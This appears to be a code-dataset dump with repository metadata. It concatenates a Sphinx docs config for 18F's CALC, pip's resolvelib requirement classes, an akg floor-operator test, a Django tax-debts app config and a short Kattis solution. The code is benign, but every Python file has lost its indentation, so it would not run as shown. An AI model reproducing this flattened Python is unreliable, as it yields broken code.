# If true, `todo` and `todoList` produce output, else they produce nothing.
todo_include_todos = False
# -- Options for HTML output ----------------------------------------------
# The theme to use for HTML and HTML Help pages. See the documentation for
# a list of builtin themes.
#
html_theme = 'sphinx_rtd_theme'
html_theme_path = [sphinx_rtd_theme.get_html_theme_path()]
# Theme options are theme-specific and customize the look and feel of a theme
# further. For a list of options available for each theme, see the
# documentation.
#
# html_theme_options = {}
# Add any paths that contain custom static files (such as style sheets) here,
# relative to this directory. They are copied after the builtin static files,
# so a file named "default.css" will overwrite the builtin "default.css".
html_static_path = []
# -- Options for HTMLHelp output ------------------------------------------
# Output file base name for HTML help builder.
htmlhelp_basename = 'CALCdoc'
# -- Options for LaTeX output ---------------------------------------------
latex_elements = {
# The paper size ('letterpaper' or 'a4paper').
#
# 'papersize': 'letterpaper',
# The font size ('10pt', '11pt' or '12pt').
#
# 'pointsize': '10pt',
# Additional stuff for the LaTeX preamble.
#
# 'preamble': '',
# Latex figure (float) alignment
#
# 'figure_align': 'htbp',
}
# Grouping the document tree into LaTeX files. List of tuples
# (source start file, target name, title,
# author, documentclass [howto, manual, or own class]).
latex_documents = [
(master_doc, 'CALC.tex', 'CALC Documentation',
'18F', 'manual'),
]
# -- Options for manual page output ---------------------------------------
# One entry per manual page. List of tuples
# (source start file, name, description, authors, manual section).
man_pages = [
(master_doc, 'calc', 'CALC Documentation',
[author], 1)
]
# -- Options for Texinfo output -------------------------------------------
# Grouping the document tree into Texinfo files. List of tuples
# (source start file, target name, title, author,
# dir menu entry, description, category)
texinfo_documents = [
(master_doc, 'CALC', 'CALC Documentation',
author, 'CALC', 'One line description of project.',
'Miscellaneous'),
]
# Example configuration for intersphinx: refer to the Python standard library.
intersphinx_mapping = {'https://docs.python.org/': None}
class PathNotFoundError(Exception):
pass
def resolve_md_url(url):
abspath = os.path.normpath(os.path.join(DOCS_DIR, url))
if not os.path.exists(abspath):
raise PathNotFoundError(
'"{}" is referenced in markdown documentation but "{}" '
'does not exist'.format(url, abspath)
)
return 'https://github.com/18F/calc/tree/develop/docs/' + url
def setup(app):
app.add_config_value('recommonmark_config', {
'url_resolver': resolve_md_url,
}, True)
app.add_transform(AutoStructify)
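# Note (added): the setup() hook above wires recommonmark's AutoStructify transform
# with a custom url_resolver so relative Markdown links under docs/ are rewritten to
# their GitHub URLs at build time; resolve_md_url() deliberately raises
# PathNotFoundError when a linked file does not exist, turning broken doc links
# into build-time failures.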
| [
"[email protected]"
] | |
18b7044e434e0878ff4a74e4acebf367bfd3596e | 1ea36bc61aed79d9ae198350e221c8d6a7073b08 | /venv/Lib/site-packages/pip/_internal/resolution/resolvelib/requirements.py | 813792d12ff37cacd53a4186dfedd722b748684d | [] | no_license | RicardoAltamiranoSanchez/Proyecto_Tienda_virtual_API_7-Sunburts | f3f0b7f166520d3d91832ac13aa0686d7b5211d8 | 4c95220415277f8561740a8da78ef68ff576f1d6 | refs/heads/master | 2023-04-25T23:40:43.804848 | 2021-05-15T16:50:44 | 2021-05-15T16:50:44 | 324,892,630 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 5,180 | py | from pip._vendor.packaging.utils import canonicalize_name
from pip._internal.utils.typing import MYPY_CHECK_RUNNING
from .base import Requirement, format_name
if MYPY_CHECK_RUNNING:
from pip._vendor.packaging.specifiers import SpecifierSet
from pip._internal.req.req_install import InstallRequirement
from .base import Candidate, CandidateLookup
class ExplicitRequirement(Requirement):
def __init__(self, candidate):
# type: (Candidate) -> None
self.candidate = candidate
def __str__(self):
# type: () -> str
return str(self.candidate)
def __repr__(self):
# type: () -> str
return "{class_name}({candidate!r})".format(
class_name=self.__class__.__name__,
candidate=self.candidate,
)
@property
def project_name(self):
# type: () -> str
# No need to canonicalise - the candidate did this
return self.candidate.project_name
@property
def name(self):
# type: () -> str
# No need to canonicalise - the candidate did this
return self.candidate.name
def format_for_error(self):
# type: () -> str
return self.candidate.format_for_error()
def get_candidate_lookup(self):
# type: () -> CandidateLookup
return self.candidate, None
def is_satisfied_by(self, candidate):
# type: (Candidate) -> bool
return candidate == self.candidate
class SpecifierRequirement(Requirement):
def __init__(self, ireq):
# type: (InstallRequirement) -> None
assert ireq.link is None, "This is a link, not a specifier"
self._ireq = ireq
self._extras = frozenset(ireq.extras)
def __str__(self):
# type: () -> str
return str(self._ireq.req)
def __repr__(self):
# type: () -> str
return "{class_name}({requirement!r})".format(
class_name=self.__class__.__name__,
requirement=str(self._ireq.req),
)
@property
def project_name(self):
# type: () -> str
return canonicalize_name(self._ireq.req.name)
@property
def name(self):
# type: () -> str
return format_name(self.project_name, self._extras)
def format_for_error(self):
# type: () -> str
# Convert comma-separated specifiers into "A, B, ..., F and G"
# This makes the specifier a bit more "human readable", without
# risking a change in meaning. (Hopefully! Not all edge cases have
# been checked)
parts = [s.strip() for s in str(self).split(",")]
if len(parts) == 0:
return ""
elif len(parts) == 1:
return parts[0]
return ", ".join(parts[:-1]) + " and " + parts[-1]
def get_candidate_lookup(self):
# type: () -> CandidateLookup
return None, self._ireq
def is_satisfied_by(self, candidate):
# type: (Candidate) -> bool
assert candidate.name == self.name, \
"Internal issue: Candidate is not for this requirement " \
" {} vs {}".format(candidate.name, self.name)
# We can safely always allow prereleases here since PackageFinder
# already implements the prerelease logic, and would have filtered out
# prerelease candidates if the user does not expect them.
spec = self._ireq.req.specifier
return spec.contains(candidate.version, prereleases=True)
class RequiresPythonRequirement(Requirement):
"""A requirement representing Requires-Python metadata.
"""
def __init__(self, specifier, match):
# type: (SpecifierSet, Candidate) -> None
self.specifier = specifier
self._candidate = match
def __str__(self):
# type: () -> str
return "Python {}".format(self.specifier)
def __repr__(self):
# type: () -> str
return "{class_name}({specifier!r})".format(
class_name=self.__class__.__name__,
specifier=str(self.specifier),
)
@property
def project_name(self):
# type: () -> str
return self._candidate.project_name
@property
def name(self):
# type: () -> str
return self._candidate.name
def format_for_error(self):
# type: () -> str
return str(self)
def get_candidate_lookup(self):
# type: () -> CandidateLookup
if self.specifier.contains(self._candidate.version, prereleases=True):
return self._candidate, None
return None, None
def is_satisfied_by(self, candidate):
# type: (Candidate) -> bool
assert candidate.name == self._candidate.name, "Not Python candidate"
# We can safely always allow prereleases here since PackageFinder
# already implements the prerelease logic, and would have filtered out
# prerelease candidates if the user does not expect them.
return self.specifier.contains(candidate.version, prereleases=True)
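# Note (added, based on how these classes are used elsewhere in
# pip._internal.resolution.resolvelib): these Requirement wrappers are what the
# resolvelib-based resolver works with -- get_candidate_lookup() lets the factory
# short-circuit candidate discovery (an explicit candidate, an InstallRequirement
# to search for, or neither), while is_satisfied_by() is the check run when
# validating a pinned candidate against each requirement.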
| [
"[email protected]"
] | |
800e01d96d0377b922a3b2148405d4d37c964fa3 | 531caac957596fc623e534bce734ef6b45be0b07 | /tests/operators/vector/test_floor_001.py | 350c04c90cd1257905c6cfa67ca849dde2b97a12 | [
"Apache-2.0",
"Zlib",
"BSD-3-Clause",
"MIT",
"LicenseRef-scancode-unknown-license-reference",
"Unlicense",
"BSD-2-Clause"
] | permissive | wxyhv/akg | 02e64d81bbb84472e0bf1c57a691b688ea743d6e | fc9b6f5b6fa024da89bf90466a815359ca54015d | refs/heads/master | 2023-03-11T02:59:18.472826 | 2021-02-23T07:44:16 | 2021-02-23T07:44:16 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 2,368 | py | # Copyright 2019 Huawei Technologies Co., Ltd
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
"""
################################################
Testcase_PrepareCondition:
Testcase_TestSteps:
Testcase_ExpectedResult:
"""
import datetime
import os
import pytest
from base import TestBase
from nose.plugins.attrib import attr
from test_run.floor_run import floor_run
############################################################
# TestCase= class: put to tests/*/
############################################################
class TestCase(TestBase):
def setup(self):
case_name = "test_akg_floor_001"
case_path = os.getcwd()
self.params_init(case_name, case_path)
self.caseresult = True
self._log.info("============= {0} Setup case============".format(self.casename))
self.testarg_ci = [
#caseflag,opfuncname,testRunArgs, dimArgs
# Deeplab v3
# ("004_floor_4_33_33_256", floor_run, ((4, 33, 33, 256), "float16", "cce_floor_fp16")),
("005_floor", floor_run, ((128, 1280), "float32", "cce_floor_fp32")),
]
self.testarg = [
#caseflag,opfuncname,testRunArgs, dimArgs
("001_floor_8192_1024", floor_run, ((8192, 1024), "float16", "cce_floor_fp16"), ((8, 8), (1024, 1024))),
("002_floor_64_16_128_128", floor_run, ((64, 16, 128, 128), "float16", "cce_floor_fp16"), ((1, 1), (1, 1), (64, 64), (128, 128))),
("003_floor_64_128_1024", floor_run, ((64, 128, 1024), "float16", "cce_floor_fp16"), ((1, 1), (8, 8), (1024, 1024))),
]
return
def test_run_ci(self):
self.common_run(self.testarg_ci)
def test_run(self):
self.common_run(self.testarg)
def teardown(self):
self._log.info("============= {0} Teardown============".format(self.casename))
return
| [
"[email protected]"
] | |
fadc77c7549de3d2eee4a4343e2f9d1d1c73a6b8 | 1bba82345900327ed1c128e8046dc91f90a0ccb5 | /tax_debts/apps.py | 0f0af72642fe3c3364064a1e06acab7be13c0dc7 | [
"MIT"
] | permissive | dchaplinsky/ragoogle | 40bd093682e41d1ee2a77f446c69d09e82bb3948 | dccb3d29334c3220ea12c46c725c443c8bd725c0 | refs/heads/master | 2021-06-11T10:07:41.142843 | 2020-10-12T10:30:39 | 2020-10-12T10:30:39 | 136,800,715 | 3 | 3 | MIT | 2021-03-19T23:20:02 | 2018-06-10T10:51:30 | CSS | UTF-8 | Python | false | false | 682 | py | from abstract.apps import AbstractConfig
from .loader import TaxDebtsLoader
from .elastic_models import ElasticTaxDebtsModel, tax_debts_idx
class TaxDebtsConfig(AbstractConfig):
name = "tax_debts"
    verbose_name = "Податковий борг"  # Ukrainian: "Tax debt"
    short_name = "ДФС"  # Ukrainian abbreviation of the State Fiscal Service
loader_class = TaxDebtsLoader
@property
def data_model(self):
# Doing that to prevent circular imports of some kind
from .models import TaxDebtsModel
return TaxDebtsModel
@property
def sitemap(self):
from .sitemaps import TaxDebtsSitemap
return TaxDebtsSitemap
elastic_model = ElasticTaxDebtsModel
elastic_index = tax_debts_idx
| [
"[email protected]"
] | |
84e37ca82405d9435b0a64bdc32f81f785b186e4 | 5f9e0c226c6f99f04446d60cd21282e7e6b05d2c | /sequence.py | 4def0862fac63ace7d5d9b90c17358bee744d122 | [] | no_license | JONNY-ME/my-kattis-solution | 867ac267dbb5faa6f7c2af35b435498a22ae269d | 51c70e0fd25f1f369cdcd2ce49a54d5d0df2358e | refs/heads/main | 2023-06-17T20:04:04.701038 | 2021-07-16T09:35:35 | 2021-07-16T09:35:35 | 386,583,581 | 0 | 1 | null | null | null | null | UTF-8 | Python | false | false | 167 | py | from math import log, ceil
k = log(int(input()), 2)
if k == int(k):
k = int(k)+1
else:
k = ceil(k)
print(k)
for i in range(k):
print(2**i, end=' ')
print() | [
"[email protected]"
] |